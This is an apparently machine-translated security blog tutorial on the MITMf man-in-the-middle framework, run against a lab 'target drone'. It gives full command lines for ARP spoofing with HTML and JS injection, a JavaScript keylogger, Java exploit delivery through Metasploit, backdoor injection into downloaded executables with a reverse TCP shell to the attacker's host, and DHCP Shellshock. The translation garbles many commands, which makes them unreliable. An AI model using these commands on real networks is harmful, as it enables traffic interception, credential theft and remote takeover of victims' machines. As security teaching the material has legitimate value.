Network hijacking new Posture: MITMF Brief Guide

Disclaimer: This article is a certain offensive, only as a technical exchange and security teaching, not to use in addition to the environment outside the building environment.

0x01 Preface

Again October 1 One, think of small partners have gone out to travel, all have wine beauty accompany, think here, can't help but weep. Son said: "Grow ugly will read more!" "So there was this article.

0x02 Brief Introduction

The main purpose of this article is to introduce a new man-in-the-middle attack test framework –MITMF. The author of the tool is BYT3BL33D3R, which is based on the proxy tool Sergio-proxy modified. Here is the address of the tool:

Https://github.com/byt3bl33d3r/MITMf

Some introduction to Tools is also in Git's reademe. The tool itself is relatively new, did not find the Chinese guide, here to write an article to communicate with you to discuss.

As soon as I saw the tool, the first sensation was nothing more than a collection of man-in-the-middle attacks. Originally, this concept has also been discussed rotten. But when I really set up a good environment to start playing, I found that the framework is still a bit of meaning, scalability is very high. In addition to the concept of "hijacking", some plug-ins also play a role of "infiltration."

0X03 tool Configuration

MITMF does not support multi-system platform, although it is written in Python, but after playing to find that the basic is to do Linux, so the students here want to play if it is win environment, you can consider using virtual machine, here is recommended to use Kali/linux.

First git under the entire framework

#git Clone https://github.com/byt3bl33d3r/MITMf.git/opt/mitmf/

Then we do a simple installation

cd/opt/mitmf./install-bdfactory.sh

When you are finished, proceed to the next installation operation

CD bdfactory/./install.sh

Then, when running, we will find that there is still no way to start the MITMF, will be prompted some modules missing, we follow the instructions in turn with PIP installation can be.

Note here, because some of the source of the module is on Google, Pip will not be installed (such as Pefile), this time you can go to https://pypi.python.org/pypi download and then manually install, the installation command is

Python xxxx Install

Additionally, you need to manually install the Python-nfqueue module yourself

sudo apt-get install Python-nfqueue

0X04 Basic Features: Cookie theft, DNS hijacking, JS injection ...

At this time we should be able to successfully start the MITMF. Enter./mitmf.py-h to get the following help interface:

The tool has several basic functions:

SSLstrip Module

I don't say much about this, and everyone can understand that the default is the open state. Here I tried to close the SSLstrip with the-d parameter, but there was no use of the case, it should be the framework itself bug.

FILEPWN Module

The main role is when the spoofed object attempts to download the file, the first analysis of the file, the executable (PE, ELF) for the backdoor injection, and then to the deceived object, which I will give a detailed description.

Cachekill Module

Emptying the client's cache buffer pool is useful when we need to re-inject a JS. This function is still very useful, about the usefulness, we can refer to Etherdream classmate's JS cache poisoning articles, not elaborate.

Spoof module

A very important module, when we use the MITM feature attack spoofing is absolutely indispensable. It mainly includes the ARP, ICMP, DHCP traffic redirection (three modes can not be used at the same time), manually specify the iptables command, etc., other rules files (CFG files) in the main directory of the Config directory, we can make a custom configuration. It is worth saying here that the tool also updated the DHCP effect on the "shell" vulnerability a few days ago, which we can specify with the Shellshock parameter. Below I will also have the picture to prove the demonstration.

Beefautorun Module

The module allows the framework to be connected to the Beef,beef of the powerful I think we all can be seen. After connecting to the beef, the MITM can be combined with the browser infiltration, the function is naturally more powerful, posture, also more wretched.

Replace module

This module can be used to replace the browsing content and support regular expressions. Note that the module is forced to flush the cache buffer pool by default, and you need to specify the Keep-cache parameter manually if you want to change the buffer content.

Inject module

You can inject all kinds of wretched things into the browsing content of the deceived person, such as JS, HTML, pictures, small movies ... is also a more useful module, as we will say later.

Browser Profiler Plugin

Enumerates browser plugins that are spoofed by the machine. It is useful for our early stage of information gathering.

JAVAPWN Module

Can be poisoned by injecting jars into the attacked machine, and Metasploit can directly penetrate the machine to the shell (I will also focus on this later), Metasploit have more powerful to play penetration of the classmate did not know it? Do not know the first to go out stand half an hour (I metasploit die of loyalty powder)

Javascript keylogger Module

A keylogger js, after the article will be introduced

APP Cache Poison

App cache poisoning. Poison the Web application and then conduct the attack test at will. It is the supplementary module of Krzysztof Kotowicz.

Upsidedownternet

Spoof module, let the browser of the world flip.

The above is a simple introduction of tools, many of which are many features we have played, so I singled out a few to show you.

Injection function of the inject module

We first inject an HTML:

./mitmf.py--iface eth0--spoof--arp--gateway 192.168.217.2--target 192.168.217.129--inject--html-url http://www.fre Ebuf.com

Then we inject a JS look:

./mitmf.py--iface eth0--spoof--arp--gateway 192.168.217.2--target 192.168.217.129--inject--js-url http://linvex.xx X.cn/test.js

Then the tool comes with the Keylogger JS, we look at how the effect:

./mitmf.py--iface eth0--spoof--arp--gateway 192.168.217.2--target 192.168.217.129--jskeylogger

After testing, the password interception of DNS hijacking is not a problem, because space is no longer shown.

0X05 Advanced Gameplay

These are some of the basic ways we play, just to let you see. Function comparison basis we use more, the next part, mainly to show you how the framework is combined with a strong Metasploit "infiltration."

(i) Exploit Java vulnerabilities for attack testing

First, we are using the Javapwn module. This module is in fact based on the Java version of the client from MSF to pick out the attack payload overflow infiltration attack process, but is to add the injected process into the ARP spoofing process rather than the kind of direct to the client as shown before a URL (similar to:/HTTP 192.168.111.111/UIHSDAVX) makes the attack more natural.

Open the Metasploit and load the MSGRPC module

#msfconsolemsf > Load Msgrpc pass=abc123

The rest of the section remains the default. Then the MITMF side, enter the following command:

./mitmf.py--iface eth0--spoof--arp--gateway 192.168.217.2--target 192.168.217.129--javapwn--MSFIP 192.168.217.137

Then we just have to wait and have a cup of coffee. In this process we can see some of the website records that target drone has visited and we can also receive some poison HTML feedback.

If it goes well, our jar is executed.

This is the time to start running the wait

Successfully get the shell

These two are the interfaces that successfully get the shell. Because Java is up-to-date in my target drone, payload in MSF cannot overflow, just generate countless connections in target drone. So the picture here is stolen.

(ii) Inject the backdoor into the PE file for penetration

With the Filepwn module, the shell can also be obtained in conjunction with MSF. Briefly say the principle of FILEPWN: ARP process if the detection of target drone has downloaded activity, then hijack the download link, first download the file to unpack the analysis, if the executable file will attempt to inject the backdoor, if the failure is repackaged. Finally, the output of the file to target drone is downloaded by target drone. The documentation here supports both ZIP and tar.gz format unpacking, supporting a variety of executable files.

Again we open the Metasploit and use handler to start listening:

Msfconsoleuse exploit/multi/handlerset lhost 192.168.217.137set lport 1447run

Before using MITMF we need to configure the configuration file, the injection information is configured as follows (only the role of the location)

............ SNIP .......        [[[WindowsIntelx86]]        Patch_type = APPEND #JUMP/single/append HOST = 192.168.217.137 PORT = 1447 SHELL = reverse_shell_tcp Supplied_shellcode = None Zero_cert = False Patch_dll = True Msfpayload = windows/shell_revers E_tcp ....... SNIP .......

Next is MITMF:

./mitmf.py--iface eth0--spoof--arp--gateway 192.168.217.2--target 192.168.217.129--filepwn

Then just wait for target drone to download the file and then execute it.

Finally our target drone executes the file, and MSF gets to the shell. Here's the final result:

Click here to see the big picture

(c) Entertain yourself

Finally, let's look at how "broken shell" works in DHCP.

./mitmf.py--iface eth0--spoof--dhcp--shellshock

The commands here can be specified by using the cmd parameter itself.

The idea that everyone agrees on this question is this: Our mobile iOS, Android are UNIX-based, so if we build a DHCP WiFi server, what can be gained?

0X06 Summary

This tool, in fact, is a large collection of man-in-the-middle attack tests, with a wide range of functions, extending the beef framework and Metasploit interfaces to make attack test postures richer. And, with the advance of the Times to expand the Web application of the poisoning function, but also brought us more ideas: man-in-the-middle attack, really just hijack the packet so simple? Intranet infiltration really can only rely on the overflow rce way? Can there be a better way? The answer is YES! ：）

The article is here for the time being, briefly introducing the basic functions of several MITMF, and more extended tools to read

Https://github.com/secretsquirrel/the-backdoor-factory

Https://github.com/secretsquirrel/BDFProxy

If there are more fun things, I will continue to share with you.

The last episode of 0x07

The night before writing the article, the roommate looked at me to test various attack test posture, and then looked at a moment to sigh that the network is more and more unsafe, it is everywhere is a pit, accidentally may be in the recruit. Then we smiled and smiled.

Network hijacking new Posture: MITMF Brief Guide